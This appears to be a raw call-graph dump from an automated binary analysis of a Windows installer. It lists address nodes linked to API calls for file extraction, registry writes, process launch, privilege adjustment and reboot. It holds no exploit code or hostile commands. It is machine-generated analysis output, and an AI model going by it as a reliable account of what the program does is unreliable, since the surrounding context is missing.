40159a ShowWindow 5356->5358 5358->5357 5359 4023f4 5360 402da6 17 API calls 5359->5360 5361 402403 5360->5361 5362 402da6 17 API calls 5361->5362 5363 40240c 5362->5363 5364 402da6 17 API calls 5363->5364 5365 402416 GetPrivateProfileStringW 5364->5365 5366 4014f5 SetForegroundWindow 5367 402c2a 5366->5367 5368 401ff6 5369 402da6 17 API calls 5368->5369 5370 401ffd 5369->5370 5371 406850 2 API calls 5370->5371 5372 402003 5371->5372 5374 402014 5372->5374 5375 406461 wsprintfW 5372->5375 5375->5374 4295 403f77 4296 4040f0 4295->4296 4297 403f8f 4295->4297 4299 404101 GetDlgItem GetDlgItem 4296->4299 4300 404141 4296->4300 4297->4296 4298 403f9b 4297->4298 4302 403fa6 SetWindowPos 4298->4302 4303 403fb9 4298->4303 4304 404476 18 API calls 4299->4304 4301 40419b 4300->4301 4309 401389 2 API calls 4300->4309 4322 4040eb 4301->4322 4368 4044c2 4301->4368 4302->4303 4306 403fc2 ShowWindow 4303->4306 4307 404004 4303->4307 4308 40412b SetClassLongW 4304->4308 4310 403fe2 GetWindowLongW 4306->4310 4311 4040dd 4306->4311 4312 404023 4307->4312 4313 40400c DestroyWindow 4307->4313 4314 40140b 2 API calls 4308->4314 4315 404173 4309->4315 4310->4311 4317 403ffb ShowWindow 4310->4317 4390 4044dd 4311->4390 4318 404028 SetWindowLongW 4312->4318 4319 404039 4312->4319 4367 4043ff 4313->4367 4314->4300 4315->4301 4321 404177 SendMessageW 4315->4321 4317->4307 4318->4322 4319->4311 4320 404045 GetDlgItem 4319->4320 4325 404073 4320->4325 4326 404056 SendMessageW IsWindowEnabled 4320->4326 4321->4322 4323 40140b 2 API calls 4335 4041ad 4323->4335 4324 404401 DestroyWindow EndDialog 4324->4367 4329 404080 4325->4329 4331 4040c7 SendMessageW 4325->4331 4332 404093 4325->4332 4341 404078 4325->4341 4326->4322 4326->4325 4327 404430 ShowWindow 4327->4322 4328 406557 17 API calls 4328->4335 4329->4331 4329->4341 4330 404476 18 API calls 4330->4335 4331->4311 4336 4040b0 4332->4336 4337 40409b 4332->4337 4334 4040ae 4334->4311 4335->4322 4335->4323 4335->4324 4335->4328 4335->4330 4358 404341 DestroyWindow 4335->4358 4371 404476 4335->4371 4338 40140b 2 API calls 4336->4338 4384 40140b 4337->4384 4340 4040b7 4338->4340 4340->4311 4340->4341 4387 40444f 4341->4387 4343 404228 GetDlgItem 4344 404245 ShowWindow KiUserCallbackDispatcher 4343->4344 4345 40423d 4343->4345 4374 404498 KiUserCallbackDispatcher 4344->4374 4345->4344 4347 40426f EnableWindow 4351 404283 4347->4351 4348 404288 GetSystemMenu EnableMenuItem SendMessageW 4349 4042b8 SendMessageW 4348->4349 4348->4351 4349->4351 4351->4348 4375 4044ab SendMessageW 4351->4375 4376 403f58 4351->4376 4379 40651a lstrcpynW 4351->4379 4354 4042e7 lstrlenW 4355 406557 17 API calls 4354->4355 4356 4042fd SetWindowTextW 4355->4356 4380 401389 4356->4380 4359 40435b CreateDialogParamW 4358->4359 4358->4367 4360 40438e 4359->4360 4359->4367 4361 404476 18 API calls 4360->4361 4362 404399 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4361->4362 4363 401389 2 API calls 4362->4363 4364 4043df 4363->4364 4364->4322 4365 4043e7 ShowWindow 4364->4365 4366 4044c2 SendMessageW 4365->4366 4366->4367 4367->4322 4367->4327 4369 4044da 4368->4369 4370 4044cb SendMessageW 4368->4370 4369->4335 4370->4369 4372 406557 17 API calls 4371->4372 4373 404481 SetDlgItemTextW 4372->4373 4373->4343 4374->4347 4375->4351 4377 406557 17 API calls 4376->4377 4378 403f66 SetWindowTextW 4377->4378 4378->4351 4379->4354 4382 401390 4380->4382 4381 4013fe 4381->4335 4382->4381 4383 4013cb MulDiv SendMessageW 4382->4383 4383->4382 4385 401389 2 API calls 4384->4385 4386 401420 4385->4386 4386->4341 4388 404456 4387->4388 4389 40445c SendMessageW 4387->4389 4388->4389 4389->4334 4391 4044f5 GetWindowLongW 4390->4391 4400 4045a0 4390->4400 4392 40450a 4391->4392 4391->4400 4393 404537 GetSysColor 4392->4393 4394 40453a 4392->4394 4392->4400 4393->4394 4395 404540 SetTextColor 4394->4395 4396 40454a SetBkMode 4394->4396 4395->4396 4397 404562 GetSysColor 4396->4397 4398 404568 4396->4398 4397->4398 4399 40456f SetBkColor 4398->4399 4401 404579 4398->4401 4399->4401 4400->4322 4401->4400 4402 404593 CreateBrushIndirect 4401->4402 4403 40458c DeleteObject 4401->4403 4402->4400 4403->4402 5376 401b77 5377 402da6 17 API calls 5376->5377 5378 401b7e 5377->5378 5379 402d84 17 API calls 5378->5379 5380 401b87 wsprintfW 5379->5380 5381 402c2a 5380->5381 5382 40167b 5383 402da6 17 API calls 5382->5383 5384 401682 5383->5384 5385 402da6 17 API calls 5384->5385 5386 40168b 5385->5386 5387 402da6 17 API calls 5386->5387 5388 401694 MoveFileW 5387->5388 5389 4016a0 5388->5389 5390 4016a7 5388->5390 5391 401423 24 API calls 5389->5391 5392 406850 2 API calls 5390->5392 5394 4022f6 5390->5394 5391->5394 5393 4016b6 5392->5393 5393->5394 5395 4062da 36 API calls 5393->5395 5395->5389 5396 6f00103d 5397 6f00101b 5 API calls 5396->5397 5398 6f001056 5397->5398 5399 4022ff 5400 402da6 17 API calls 5399->5400 5401 402305 5400->5401 5402 402da6 17 API calls 5401->5402 5403 40230e 5402->5403 5404 402da6 17 API calls 5403->5404 5405 402317 5404->5405 5406 406850 2 API calls 5405->5406 5407 402320 5406->5407 5408 402331 lstrlenW lstrlenW 5407->5408 5412 402324 5407->5412 5410 40557c 24 API calls 5408->5410 5409 40557c 24 API calls 5413 40232c 5409->5413 5411 40236f SHFileOperationW 5410->5411 5411->5412 5411->5413 5412->5409 5412->5413 5414 4019ff 5415 402da6 17 API calls 5414->5415 5416 401a06 5415->5416 5417 402da6 17 API calls 5416->5417 5418 401a0f 5417->5418 5419 401a16 lstrcmpiW 5418->5419 5420 401a28 lstrcmpW 5418->5420 5421 401a1c 5419->5421 5420->5421 5422 401000 5423 401037 BeginPaint GetClientRect 5422->5423 5424 40100c DefWindowProcW 5422->5424 5426 4010f3 5423->5426 5427 401179 5424->5427 5428 401073 CreateBrushIndirect FillRect DeleteObject 5426->5428 5429 4010fc 5426->5429 5428->5426 5430 401102 CreateFontIndirectW 5429->5430 5431 401167 EndPaint 5429->5431 5430->5431 5432 401112 6 API calls 5430->5432 5431->5427 5432->5431 5433 401d81 5434 401d94 GetDlgItem 5433->5434 5435 401d87 5433->5435 5437 401d8e 5434->5437 5436 402d84 17 API calls 5435->5436 5436->5437 5439 402da6 17 API calls 5437->5439 5441 401dd5 GetClientRect LoadImageW SendMessageW 5437->5441 5439->5441 5440 401e33 5442 401e38 DeleteObject 5440->5442 5443 401e3f 5440->5443 5441->5440 5441->5443 5442->5443 5444 6f002d43 5445 6f002d5b 5444->5445 5446 6f00162f 2 API calls 5445->5446 5447 6f002d76 5446->5447 5448 401503 5449 40150b 5448->5449 5451 40151e 5448->5451 5450 402d84 17 API calls 5449->5450 5450->5451 5452 402383 5453 40238a 5452->5453 5456 40239d 5452->5456 5454 406557 17 API calls 5453->5454 5455 402397 5454->5455 5455->5456 5457 405b7a MessageBoxIndirectW 5455->5457 5457->5456 5458 402c05 SendMessageW 5459 402c1f InvalidateRect 5458->5459 5460 402c2a 5458->5460 5459->5460 5461 403b87 5462 403b92 5461->5462 5463 403b96 5462->5463 5464 403b99 GlobalAlloc 5462->5464 5464->5463 4598 40350a SetErrorMode GetVersionExW 4599 403594 4598->4599 4600 40355c GetVersionExW 4598->4600 4601 4035ed 4599->4601 4602 4068e7 5 API calls 4599->4602 4600->4599 4603 406877 3 API calls 4601->4603 4602->4601 4604 403603 lstrlenA 4603->4604 4604->4601 4605 403613 4604->4605 4606 4068e7 5 API calls 4605->4606 4607 40361a 4606->4607 4608 4068e7 5 API calls 4607->4608 4609 403621 4608->4609 4610 4068e7 5 API calls 4609->4610 4611 40362d #17 OleInitialize SHGetFileInfoW 4610->4611 4689 40651a lstrcpynW 4611->4689 4614 40367a GetCommandLineW 4690 40651a lstrcpynW 4614->4690 4616 40368c 4617 405e16 CharNextW 4616->4617 4618 4036b2 CharNextW 4617->4618 4626 4036c3 4618->4626 4619 4037c1 4620 4037d5 GetTempPathW 4619->4620 4691 4034d9 4620->4691 4622 4037ed 4623 4037f1 GetWindowsDirectoryW lstrcatW 4622->4623 4624 403847 DeleteFileW 4622->4624 4627 4034d9 12 API calls 4623->4627 4701 40307d GetTickCount GetModuleFileNameW 4624->4701 4625 405e16 CharNextW 4625->4626 4626->4619 4626->4625 4633 4037c3 4626->4633 4630 40380d 4627->4630 4629 40385a 4631 40391e 4629->4631 4634 40390f 4629->4634 4638 405e16 CharNextW 4629->4638 4630->4624 4632 403811 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4630->4632 4793 403aef 4631->4793 4637 4034d9 12 API calls 4632->4637 4785 40651a lstrcpynW 4633->4785 4729 403bc9 4634->4729 4641 40383f 4637->4641 4654 40387c 4638->4654 4641->4624 4641->4631 4642 403a46 4800 405b7a 4642->4800 4643 403a5b 4645 403a63 GetCurrentProcess OpenProcessToken 4643->4645 4646 403ad9 ExitProcess 4643->4646 4651 403aa9 4645->4651 4652 403a7a LookupPrivilegeValueW AdjustTokenPrivileges 4645->4652 4648 4038e5 4656 405ef1 18 API calls 4648->4656 4649 403926 4655 405ae5 5 API calls 4649->4655 4653 4068e7 5 API calls 4651->4653 4652->4651 4657 403ab0 4653->4657 4654->4648 4654->4649 4658 40392b lstrcatW 4655->4658 4659 4038f1 4656->4659 4660 403ac5 ExitWindowsEx 4657->4660 4663 403ad2 4657->4663 4661 403947 lstrcatW lstrcmpiW 4658->4661 4662 40393c lstrcatW 4658->4662 4659->4631 4786 40651a lstrcpynW 4659->4786 4660->4646 4660->4663 4661->4631 4664 403967 4661->4664 4662->4661 4667 40140b 2 API calls 4663->4667 4668 403973 4664->4668 4669 40396c 4664->4669 4666 403904 4787 40651a lstrcpynW 4666->4787 4667->4646 4670 405ac8 2 API calls 4668->4670 4672 405a4b 4 API calls 4669->4672 4673 403978 SetCurrentDirectoryW 4670->4673 4674 403971 4672->4674 4675 403995 4673->4675 4676 40398a 4673->4676 4674->4673 4789 40651a lstrcpynW 4675->4789 4788 40651a lstrcpynW 4676->4788 4679 406557 17 API calls 4680 4039d7 DeleteFileW 4679->4680 4681 4039e3 CopyFileW 4680->4681 4686 4039a2 4680->4686 4681->4686 4682 403a2d 4683 4062da 36 API calls 4682->4683 4683->4631 4684 4062da 36 API calls 4684->4686 4685 406557 17 API calls 4685->4686 4686->4679 4686->4682 4686->4684 4686->4685 4688 403a17 CloseHandle 4686->4688 4790 405afd CreateProcessW 4686->4790 4688->4686 4689->4614 4690->4616 4692 4067a1 5 API calls 4691->4692 4693 4034e5 4692->4693 4694 4034ef 4693->4694 4695 405de9 3 API calls 4693->4695 4694->4622 4696 4034f7 4695->4696 4697 405ac8 2 API calls 4696->4697 4698 4034fd 4697->4698 4804 406039 4698->4804 4808 40600a GetFileAttributesW CreateFileW 4701->4808 4703 4030bd 4723 4030cd 4703->4723 4809 40651a lstrcpynW 4703->4809 4705 4030e3 4706 405e35 2 API calls 4705->4706 4707 4030e9 4706->4707 4810 40651a lstrcpynW 4707->4810 4709 4030f4 GetFileSize 4710 4031ee 4709->4710 4728 40310b 4709->4728 4811 403019 4710->4811 4712 4031f7 4714 403227 GlobalAlloc 4712->4714 4712->4723 4846 4034c2 SetFilePointer 4712->4846 4822 4034c2 SetFilePointer 4714->4822 4716 40325a 4720 403019 6 API calls 4716->4720 4718 403210 4721 4034ac ReadFile 4718->4721 4719 403242 4823 4032b4 4719->4823 4720->4723 4724 40321b 4721->4724 4723->4629 4724->4714 4724->4723 4725 403019 6 API calls 4725->4728 4726 40324e 4726->4723 4726->4726 4727 40328b SetFilePointer 4726->4727 4727->4723 4728->4710 4728->4716 4728->4723 4728->4725 4843 4034ac 4728->4843 4730 4068e7 5 API calls 4729->4730 4731 403bdd 4730->4731 4732 403be3 4731->4732 4733 403bf5 4731->4733 4867 406461 wsprintfW 4732->4867 4734 4063e8 3 API calls 4733->4734 4736 403c25 4734->4736 4735 403c44 lstrcatW 4739 403bf3 4735->4739 4736->4735 4738 4063e8 3 API calls 4736->4738 4738->4735 4852 403e9f 4739->4852 4742 405ef1 18 API calls 4743 403c76 4742->4743 4744 403d0a 4743->4744 4746 4063e8 3 API calls 4743->4746 4745 405ef1 18 API calls 4744->4745 4747 403d10 4745->4747 4748 403ca8 4746->4748 4749 403d20 LoadImageW 4747->4749 4752 406557 17 API calls 4747->4752 4748->4744 4755 403cc9 lstrlenW 4748->4755 4759 405e16 CharNextW 4748->4759 4750 403dc6 4749->4750 4751 403d47 RegisterClassW 4749->4751 4754 40140b 2 API calls 4750->4754 4753 403d7d SystemParametersInfoW CreateWindowExW 4751->4753 4784 403dd0 4751->4784 4752->4749 4753->4750 4758 403dcc 4754->4758 4756 403cd7 lstrcmpiW 4755->4756 4757 403cfd 4755->4757 4756->4757 4760 403ce7 GetFileAttributesW 4756->4760 4761 405de9 3 API calls 4757->4761 4764 403e9f 18 API calls 4758->4764 4758->4784 4762 403cc6 4759->4762 4763 403cf3 4760->4763 4765 403d03 4761->4765 4762->4755 4763->4757 4766 405e35 2 API calls 4763->4766 4767 403ddd 4764->4767 4868 40651a lstrcpynW 4765->4868 4766->4757 4769 403de9 ShowWindow 4767->4769 4770 403e6c 4767->4770 4772 406877 3 API calls 4769->4772 4860 40564f OleInitialize 4770->4860 4774 403e01 4772->4774 4773 403e72 4775 403e76 4773->4775 4776 403e8e 4773->4776 4777 403e0f GetClassInfoW 4774->4777 4779 406877 3 API calls 4774->4779 4783 40140b 2 API calls 4775->4783 4775->4784 4778 40140b 2 API calls 4776->4778 4780 403e23 GetClassInfoW RegisterClassW 4777->4780 4781 403e39 DialogBoxParamW 4777->4781 4778->4784 4779->4777 4780->4781 4782 40140b 2 API calls 4781->4782 4782->4784 4783->4784 4784->4631 4785->4620 4786->4666 4787->4634 4788->4675 4789->4686 4791 405b30 CloseHandle 4790->4791 4792 405b3c 4790->4792 4791->4792 4792->4686 4794 403b07 4793->4794 4795 403af9 CloseHandle 4793->4795 4870 403b34 4794->4870 4795->4794 4798 405c26 67 API calls 4799 403a3b OleUninitialize 4798->4799 4799->4642 4799->4643 4801 405b8f 4800->4801 4802 403a53 ExitProcess 4801->4802 4803 405ba3 MessageBoxIndirectW 4801->4803 4803->4802 4805 406046 GetTickCount GetTempFileNameW 4804->4805 4806 403508 4805->4806 4807 40607c 4805->4807 4806->4622 4807->4805 4807->4806 4808->4703 4809->4705 4810->4709 4812 403022 4811->4812 4813 40303a 4811->4813 4814 403032 4812->4814 4815 40302b DestroyWindow 4812->4815 4816 403042 4813->4816 4817 40304a GetTickCount 4813->4817 4814->4712 4815->4814 4847 406923 4816->4847 4819 403058 CreateDialogParamW ShowWindow 4817->4819 4820 40307b 4817->4820 4819->4820 4820->4712 4822->4719 4824 4032cd 4823->4824 4825 4032fb 4824->4825 4851 4034c2 SetFilePointer 4824->4851 4827 4034ac ReadFile 4825->4827 4828 403306 4827->4828 4829 403445 4828->4829 4830 403318 GetTickCount 4828->4830 4834 40342f 4828->4834 4831 403487 4829->4831 4836 403449 4829->4836 4830->4834 4839 403344 4830->4839 4832 4034ac ReadFile 4831->4832 4832->4834 4833 4034ac ReadFile 4833->4839 4834->4726 4835 4034ac ReadFile 4835->4836 4836->4834 4836->4835 4837 4060bc WriteFile 4836->4837 4837->4836 4838 40339a GetTickCount 4838->4839 4839->4833 4839->4834 4839->4838 4840 4033bf MulDiv wsprintfW 4839->4840 4842 4060bc WriteFile 4839->4842 4841 40557c 24 API calls 4840->4841 4841->4839 4842->4839 4844 40608d ReadFile 4843->4844 4845 4034bf 4844->4845 4845->4728 4846->4718 4848 406940 PeekMessageW 4847->4848 4849 403048 4848->4849 4850 406936 DispatchMessageW 4848->4850 4849->4712 4850->4848 4851->4825 4853 403eb3 4852->4853 4869 406461 wsprintfW 4853->4869 4855 403f24 4856 403f58 18 API calls 4855->4856 4857 403f29 4856->4857 4858 403c54 4857->4858 4859 406557 17 API calls 4857->4859 4858->4742 4859->4857 4861 4044c2 SendMessageW 4860->4861 4863 405672 4861->4863 4862 4044c2 SendMessageW 4864 4056ab OleUninitialize 4862->4864 4865 401389 2 API calls 4863->4865 4866 405699 4863->4866 4864->4773 4865->4863 4866->4862 4867->4739 4868->4744 4869->4855 4871 403b42 4870->4871 4872 403b0c 4871->4872 4873 403b47 FreeLibrary GlobalFree 4871->4873 4872->4798 4873->4872 4873->4873 5465 40248a 5466 402da6 17 API calls 5465->5466 5467 40249c 5466->5467 5468 402da6 17 API calls 5467->5468 5469 4024a6 5468->5469 5482 402e36 5469->5482 5472 402c2a 5473 4024de 5475 4024ea 5473->5475 5478 402d84 17 API calls 5473->5478 5474 402da6 17 API calls 5477 4024d4 lstrlenW 5474->5477 5476 402509 RegSetValueExW 5475->5476 5479 4032b4 31 API calls 5475->5479 5480 40251f RegCloseKey 5476->5480 5477->5473 5478->5475 5479->5476 5480->5472 5483 402e51 5482->5483 5486 4063b5 5483->5486 5487 4063c4 5486->5487 5488 4024b6 5487->5488 5489 4063cf RegCreateKeyExW 5487->5489 5488->5472 5488->5473 5488->5474 5489->5488 5490 40290b 5491 402da6 17 API calls 5490->5491 5492 402912 FindFirstFileW 5491->5492 5493 40293a 5492->5493 5497 402925 5492->5497 5494 402943 5493->5494 5498 406461 wsprintfW 5493->5498 5499 40651a lstrcpynW 5494->5499 5498->5494 5499->5497 5500 40190c 5501 401943 5500->5501 5502 402da6 17 API calls 5501->5502 5503 401948 5502->5503 5504 405c26 67 API calls 5503->5504 5505 401951 5504->5505 5506 40190f 5507 402da6 17 API calls 5506->5507 5508 401916 5507->5508 5509 405b7a MessageBoxIndirectW 5508->5509 5510 40191f 5509->5510 5511 401491 5512 40557c 24 API calls 5511->5512 5513 401498 5512->5513 5514 402891 5515 402898 5514->5515 5517 402ba9 5514->5517 5516 402d84 17 API calls 5515->5516 5518 40289f 5516->5518 5519 4028ae SetFilePointer 5518->5519 5519->5517 5520 4028be 5519->5520 5522 406461 wsprintfW 5520->5522 5522->5517 5523 401f12 5524 402da6 17 API calls 5523->5524 5525 401f18 5524->5525 5526 402da6 17 API calls 5525->5526 5527 401f21 5526->5527 5528 402da6 17 API calls 5527->5528 5529 401f2a 5528->5529 5530 402da6 17 API calls 5529->5530 5531 401f33 5530->5531 5532 401423 24 API calls 5531->5532 5533 401f3a 5532->5533 5540 405b40 ShellExecuteExW 5533->5540 5535 401f82 5537 40292e 5535->5537 5541 406992 WaitForSingleObject 5535->5541 5538 401f9f CloseHandle 5538->5537 5540->5535 5542 4069ac 5541->5542 5543 4069be GetExitCodeProcess 5542->5543 5544 406923 2 API calls 5542->5544 5543->5538 5545 4069b3 WaitForSingleObject 5544->5545 5545->5542 5546 402f93 5547 402fa5 SetTimer 5546->5547 5548 402fbe 5546->5548 5547->5548 5549 403013 5548->5549 5550 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5548->5550 5550->5549 5551 401d17 5552 402d84 17 API calls 5551->5552 5553 401d1d IsWindow 5552->5553 5554 401a20 5553->5554 5555 6f001058 5557 6f001074 5555->5557 5556 6f0010dd 5557->5556 5558 6f0015b6 GlobalFree 5557->5558 5559 6f001092 5557->5559 5558->5559 5560 6f0015b6 GlobalFree 5559->5560 5561 6f0010a2 5560->5561 5562 6f0010b2 5561->5562 5563 6f0010a9 GlobalSize 5561->5563 5564 6f0010b6 GlobalAlloc 5562->5564 5565 6f0010c7 5562->5565 5563->5562 5566 6f0015dd 3 API calls 5564->5566 5567 6f0010d2 GlobalFree 5565->5567 5566->5565 5567->5556 5568 401b9b 5569 401bec 5568->5569 5574 401ba8 5568->5574 5571 401bf1 5569->5571 5572 401c16 GlobalAlloc 5569->5572 5570 401c31 5575 406557 17 API calls 5570->5575 5581 40239d 5570->5581 5571->5581 5589 40651a lstrcpynW 5571->5589 5573 406557 17 API calls 5572->5573 5573->5570 5574->5570 5576 401bbf 5574->5576 5577 402397 5575->5577 5587 40651a lstrcpynW 5576->5587 5577->5581 5582 405b7a MessageBoxIndirectW 5577->5582 5580 401c03 GlobalFree 5580->5581 5582->5581 5583 401bce 5588 40651a lstrcpynW 5583->5588 5585 401bdd 5590 40651a lstrcpynW 5585->5590 5587->5583 5588->5585 5589->5580 5590->5581 5591 40261c 5592 402da6 17 API calls 5591->5592 5593 402623 5592->5593 5596 40600a GetFileAttributesW CreateFileW 5593->5596 5595 40262f 5596->5595 5597 40149e 5598 4014ac PostQuitMessage 5597->5598 5599 40239d 5597->5599 5598->5599 5600 40259e 5610 402de6 5600->5610 5603 402d84 17 API calls 5604 4025b1 5603->5604 5605 4025d9 RegEnumValueW 5604->5605 5606 4025cd RegEnumKeyW 5604->5606 5608 40292e 5604->5608 5607 4025ee RegCloseKey 5605->5607 5606->5607 5607->5608 5611 402da6 17 API calls 5610->5611 5612 402dfd 5611->5612 5613 406387 RegOpenKeyExW 5612->5613 5614 4025a8 5613->5614 5614->5603 5615 404920 5616 404930 5615->5616 5617 404956 5615->5617 5619 404476 18 API calls 5616->5619 5618 4044dd 8 API calls 5617->5618 5620 404962 5618->5620 5621 40493d SetDlgItemTextW 5619->5621 5621->5617 5622 6f0010e1 5623 6f001111 5622->5623 5624 6f0012b0 GlobalFree 5623->5624 5625 6f0011d7 GlobalAlloc 5623->5625 5626 6f001240 GlobalFree 5623->5626 5627 6f00135a 2 API calls 5623->5627 5628 6f0012ab 5623->5628 5629 6f001312 2 API calls 5623->5629 5630 6f00129a GlobalFree 5623->5630 5631 6f00116b GlobalAlloc 5623->5631 5632 6f001381 lstrcpyW 5623->5632 5625->5623 5626->5623 5627->5623 5628->5624 5629->5623 5630->5623 5631->5623 5632->5623 5633 4015a3 5634 402da6 17 API calls 5633->5634 5635 4015aa SetFileAttributesW 5634->5635 5636 4015bc 5635->5636 5637 401fa4 5638 402da6 17 API calls 5637->5638 5639 401faa 5638->5639 5640 40557c 24 API calls 5639->5640 5641 401fb4 5640->5641 5642 405afd 2 API calls 5641->5642 5643 401fba 5642->5643 5645 406992 5 API calls 5643->5645 5646 40292e 5643->5646 5648 401fdd CloseHandle 5643->5648 5647 401fcf 5645->5647 5647->5648 5650 406461 wsprintfW 5647->5650 5648->5646 5650->5648 5651 6f0023e9 5652 6f002453 5651->5652 5653 6f00245e GlobalAlloc 5652->5653 5654 6f00247d 5652->5654 5653->5652 5655 40202a 5656 402da6 17 API calls 5655->5656 5657 402031 5656->5657 5658 4068e7 5 API calls 5657->5658 5659 402040 5658->5659 5660 40205c GlobalAlloc 5659->5660 5662 4020cc 5659->5662 5661 402070 5660->5661 5660->5662 5663 4068e7 5 API calls 5661->5663 5664 402077 5663->5664 5665 4068e7 5 API calls 5664->5665 5666 402081 5665->5666 5666->5662 5670 406461 wsprintfW 5666->5670 5668 4020ba 5671 406461 wsprintfW 5668->5671 5670->5668 5671->5662 5672 40252a 5673 402de6 17 API calls 5672->5673 5674 402534 5673->5674 5675 402da6 17 API calls 5674->5675 5676 40253d 5675->5676 5677 402548 RegQueryValueExW 5676->5677 5680 40292e 5676->5680 5678 40256e RegCloseKey 5677->5678 5679 402568 5677->5679 5678->5680 5679->5678 5683 406461 wsprintfW 5679->5683 5683->5678 5684 4021aa 5685 402da6 17 API calls 5684->5685 5686 4021b1 5685->5686 5687 402da6 17 API calls 5686->5687 5688 4021bb 5687->5688 5689 402da6 17 API calls 5688->5689 5690 4021c5 5689->5690 5691 402da6 17 API calls 5690->5691 5692 4021cf 5691->5692 5693 402da6 17 API calls 5692->5693 5694 4021d9 5693->5694 5695 402218 CoCreateInstance 5694->5695 5696 402da6 17 API calls 5694->5696 5699 402237 5695->5699 5696->5695 5697 401423 24 API calls 5698 4022f6 5697->5698 5699->5697 5699->5698 5700 4045ac lstrcpynW lstrlenW 5701 401a30 5702 402da6 17 API calls 5701->5702 5703 401a39 ExpandEnvironmentStringsW 5702->5703 5704 401a4d 5703->5704 5706 401a60 5703->5706 5705 401a52 lstrcmpW 5704->5705 5704->5706 5705->5706 5712 4023b2 5713 4023ba 5712->5713 5716 4023c0 5712->5716 5714 402da6 17 API calls 5713->5714 5714->5716 5715 4023ce 5718 4023dc 5715->5718 5719 402da6 17 API calls 5715->5719 5716->5715 5717 402da6 17 API calls 5716->5717 5717->5715 5720 402da6 17 API calls 5718->5720 5719->5718 5721 4023e5 WritePrivateProfileStringW 5720->5721 5722 402434 5723 402467 5722->5723 5724 40243c 5722->5724 5725 402da6 17 API calls 5723->5725 5726 402de6 17 API calls 5724->5726 5727 40246e 5725->5727 5728 402443 5726->5728 5733 402e64 5727->5733 5730 402da6 17 API calls 5728->5730 5732 40247b 5728->5732 5731 402454 RegDeleteValueW RegCloseKey 5730->5731 5731->5732 5734 402e78 5733->5734 5735 402e71 5733->5735 5734->5735 5737 402ea9 5734->5737 5735->5732 5738 406387 RegOpenKeyExW 5737->5738 5739 402ed7 5738->5739 5740 402ee7 RegEnumValueW 5739->5740 5741 402f0a 5739->5741 5748 402f81 5739->5748 5740->5741 5742 402f71 RegCloseKey 5740->5742 5741->5742 5743 402f46 RegEnumKeyW 5741->5743 5744 402f4f RegCloseKey 5741->5744 5746 402ea9 6 API calls 5741->5746 5742->5748 5743->5741 5743->5744 5745 4068e7 5 API calls 5744->5745 5747 402f5f 5745->5747 5746->5741 5747->5748 5749 402f63 RegDeleteKeyW 5747->5749 5748->5735 5749->5748 5750 6f001774 5751 6f0017a3 5750->5751 5752 6f001bff 22 API calls 5751->5752 5753 6f0017aa 5752->5753 5754 6f0017b1 5753->5754 5755 6f0017bd 5753->5755 5758 6f001312 2 API calls 5754->5758 5756 6f0017e4 5755->5756 5757 6f0017c7 5755->5757 5760 6f0017ea 5756->5760 5761 6f00180e 5756->5761 5759 6f0015dd 3 API calls 5757->5759 5765 6f0017bb 5758->5765 5762 6f0017cc 5759->5762 5763 6f001654 3 API calls 5760->5763 5764 6f0015dd 3 API calls 5761->5764 5766 6f001654 3 API calls 5762->5766 5767 6f0017ef 5763->5767 5764->5765 5768 6f0017d2 5766->5768 5769 6f001312 2 API calls 5767->5769 5770 6f001312 2 API calls 5768->5770 5771 6f0017f5 GlobalFree 5769->5771 5772 6f0017d8 GlobalFree 5770->5772 5771->5765 5773 6f001809 GlobalFree 5771->5773 5772->5765 5773->5765 5774 404635 5775 40464d 5774->5775 5778 404767 5774->5778 5779 404476 18 API calls 5775->5779 5776 4047d1 5777 4047db GetDlgItem 5776->5777 5780 40489b 5776->5780 5782 4047f5 5777->5782 5783 40485c 5777->5783 5778->5776 5778->5780 5784 4047a2 GetDlgItem SendMessageW 5778->5784 5785 4046b4 5779->5785 5781 4044dd 8 API calls 5780->5781 5786 404896 5781->5786 5782->5783 5787 40481b SendMessageW LoadCursorW SetCursor 5782->5787 5783->5780 5788 40486e 5783->5788 5807 404498 KiUserCallbackDispatcher 5784->5807 5790 404476 18 API calls 5785->5790 5808 4048e4 5787->5808 5792 404884 5788->5792 5793 404874 SendMessageW 5788->5793 5795 4046c1 CheckDlgButton 5790->5795 5792->5786 5798 40488a SendMessageW 5792->5798 5793->5792 5794 4047cc 5799 4048c0 SendMessageW 5794->5799 5805 404498 KiUserCallbackDispatcher 5795->5805 5798->5786 5799->5776 5800 4046df GetDlgItem 5806 4044ab SendMessageW 5800->5806 5802 4046f5 SendMessageW 5803 404712 GetSysColor 5802->5803 5804 40471b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5802->5804 5803->5804 5804->5786 5805->5800 5806->5802 5807->5794 5811 405b40 ShellExecuteExW 5808->5811 5810 40484a LoadCursorW SetCursor 5810->5783 5811->5810 5812 401735 5813 402da6 17 API calls 5812->5813 5814 40173c SearchPathW 5813->5814 5815 401757 5814->5815 5816 4014b8 5817 4014be 5816->5817 5818 401389 2 API calls 5817->5818 5819 4014c6 5818->5819 5820 401d38 5821 402d84 17 API calls 5820->5821 5822 401d3f 5821->5822 5823 402d84 17 API calls 5822->5823 5824 401d4b GetDlgItem 5823->5824 5825 402638 5824->5825 5826 6f001979 5827 6f00199c 5826->5827 5828 6f0019d1 GlobalFree 5827->5828 5829 6f0019e3 5827->5829 5828->5829 5830 6f001312 2 API calls 5829->5830 5831 6f001b6e GlobalFree GlobalFree 5830->5831 4874 4056bb 4875 405865 4874->4875 4876 4056dc GetDlgItem GetDlgItem GetDlgItem 4874->4876 4878 405896 4875->4878 4879 40586e GetDlgItem CreateThread CloseHandle 4875->4879 4920 4044ab SendMessageW 4876->4920 4880 4058c1 4878->4880 4882 4058e6 4878->4882 4883 4058ad ShowWindow ShowWindow 4878->4883 4879->4878 4923 40564f 5 API calls 4879->4923 4884 405921 4880->4884 4885 4058cd 4880->4885 4881 40574c 4887 405753 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4881->4887 4886 4044dd 8 API calls 4882->4886 4922 4044ab SendMessageW 4883->4922 4884->4882 4896 40592f SendMessageW 4884->4896 4889 4058d5 4885->4889 4890 4058fb ShowWindow 4885->4890 4891 4058f4 4886->4891 4894 4057c1 4887->4894 4895 4057a5 SendMessageW SendMessageW 4887->4895 4897 40444f SendMessageW 4889->4897 4892 40591b 4890->4892 4893 40590d 4890->4893 4899 40444f SendMessageW 4892->4899 4898 40557c 24 API calls 4893->4898 4900 4057d4 4894->4900 4901 4057c6 SendMessageW 4894->4901 4895->4894 4896->4891 4902 405948 CreatePopupMenu 4896->4902 4897->4882 4898->4892 